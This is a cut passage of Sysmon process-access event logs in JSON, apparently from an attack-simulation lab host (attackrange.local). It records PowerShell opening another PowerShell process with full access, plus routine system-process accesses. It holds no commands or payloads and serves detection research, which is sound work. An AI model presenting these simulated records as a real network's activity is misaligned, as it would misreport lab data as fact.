06:55:01.475","SourceProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001011EA0600}","SourceProcessId":"2872","SourceThreadId":"3276","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","TargetProcessId":"4500","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|UNKNOWN(00007FFF44568890)","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5068,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.475\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nTargetProcessId: 4500\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.475","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","TargetProcessId":"4500","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5069,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.475\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.475","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5070,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.475\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.475","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5071,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.475\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.475","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5072,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.475\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.475","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5073,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.475\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.475","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5074,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.475\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.475","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5075,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.475\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.475","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5076,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.475\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 